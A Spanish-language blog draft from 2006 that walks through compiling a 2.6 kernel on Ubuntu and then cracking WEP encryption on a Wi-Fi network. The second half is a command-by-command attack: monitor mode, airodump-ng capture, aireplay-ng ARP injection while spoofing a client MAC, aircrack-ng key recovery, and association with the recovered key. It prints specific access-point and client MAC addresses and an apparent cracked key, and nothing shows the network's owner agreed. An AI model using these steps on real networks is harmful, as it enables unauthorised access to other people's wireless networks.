2006-12-11

Crack wep Wifi con Kernel 2.6

BORRADOR - BORRADOR - BORRADOR - BORRADOR - BORRADOR - BORRADOR

Un amigo me pidió que viera como hacer funcionar el proceso de crack que tenía hecho pero en un Kernel 2.6, asi que me puse a ello.
Mi proceso anterior, funcionaba en un kernel 2.4, aunque no era imposible, no sabía como hacerlo en un 2.6.

En base a este link, aprendí como compilar el 2.6 y preparar una portatil para crack de wep.(wifi)
http://elmodem.wordpress.com/2006/11/09/como-compilar-el-kernel-de-kubuntu/


Boot de un ubuntú con 2.6.17-10-generic
(en mi caso la version amd 64 bits)

Sobre la instalacion desktop normal, agregar varios paquetes.


___ su root
(para trabajar como root y evitarme problemas)

Agregar fuentes de repositorios, porque los que trae Ubuntu por default no son todos.

___ cd /etc/apt
___ vi sources.list

Y quitar los DEB que tienen el comentario delante #
Son varios. Como decía mi abuela, "lo que abunda no daña."


Luego instalar mas paquetes. (puede que tengan algunos ya instalados)

___ apt-get install build-essential kernel-package hostapd mc linux-source libncurses5 libncurses5-dev aircrack-ng
(el source que instaló es el 2.6.17-13)

El instalar el source, solo crea un fichero en /usr/src con el fuente compactado,
usando el MC, lo descompacto y creo la carpeta correcta, algo similar a Linux-source-2.6.17.
(ese nombre puede variar, se puede descompactar tambien con tar -xvf)

luego crear un link simbólico a esa carpeta, llamándolo Linux con esto:

ln -s /usr/src/linux-source**** /usr/src/linux



Luego limpiar posibles compiladas anteriores.

___ make-kpkg clean


Copiar fichero de configuracion del kernel actual.

___ cp /boot/config-2.6.17-10-generic /usr/src/.config



Luego ver que pueda cambiar opciones del kernel, agregar o quitar módulos y demas.
(en este caso, no cambiamos nada, solo miramos las opciones)

___ make menuconfig
(si esto no funciona, puede ser por bibliotecas ncurses)


Luego compilamos el kernel. Con 2.6 es un poco mas sencillo todo el proceso.

___ make-kpkg -append-to-version=.deco1 -initrd kernel_image


Luego nos paramos en la carpeta Sources.

___ cd /usr/src


E instalamos el nuevo kernel

___ dpkg -i kernel-image-2.6.15.7-ubuntu1.deco1_2.6.17.13-ubuntu1.ubuntu1-10.00.Custom_amd64.deb


En esa instalacion, crea entradas en GRUB, en MENU.LST y prepara todo para el nuevo reinicio.

Luego

___ reboot

y seguramente todo ira bien.



****** AHORA EL CRACK WEP ******

En /etc/modules agregar hostap y hostap_cs, para que cargue esos módulos en cada arranque.

___ vi /etc/modules




* editar el /etc/kismet/kismet.conf (hostap,wlan0,Prism2)
(yo uso una placa d-link dwl650, puede que al usar otras el PRISM2 haya que cambiarlo)


* Correr Kismet, ver red y detectar el AP ( CISCO 00:40:96:a2:79:EE ch.9)

* ifconfig -a , para ver todas las placas, debe aparecer wlan0 y wifi0

* iwconfig wlan0 mode monitor (para activar monitor RF)

* ifconfig wlan0 promisc

* ifconfig wlan0 (para ver caracteristicas de la placa dlink)

* NO Dejar corriendo KISMET

* En otra ventana

airodump-ng --channel 9 -b CISCO wlan0 -w temp1

ver clientes conectados al AP, obtener MAC del AP y de algun cliente
00:c0:49:f6:37:3d
00:15:00:36:54:6f
00:11:0A:80:F5:88
00:0F:20:93:C1:55
00:14:C2:51:77:F1

* EN OTRA VENTANA

aireplay-ng -3 -g 180 -r temp1-01.cap -b 00:40:96:A2:79:EE -h 00:C0:49:F6:37:3D wlan0
Esto inyectará paquetes para el AP desde un cliente.
Si el texto "GOT nnnn ARP Request" no aumenta rapidametne, es que algo va mal.


* EN OTRA VENTANA

aircrack-ng -a 1 replay_arp-1016-173322.cap
Esto intentará obtener el código WEP (esto es realmente el CRACK)



* PRUEBA DE QUE EL CRACK ES CORRECTO

iwconfig wlan0 mode Managed key 22:05:19:79:30:03:19:76:17:03:19:82:27 essid CISCO
Asociarse al AP, poniendo el KEY. Quizás luego hacer un dhclient para obtener IP, luego ping a

www.google.es y deberia funcionar.

AHHHH me olvidaba, Felices Navidades !!!!

No hay comentarios:

Por el mundo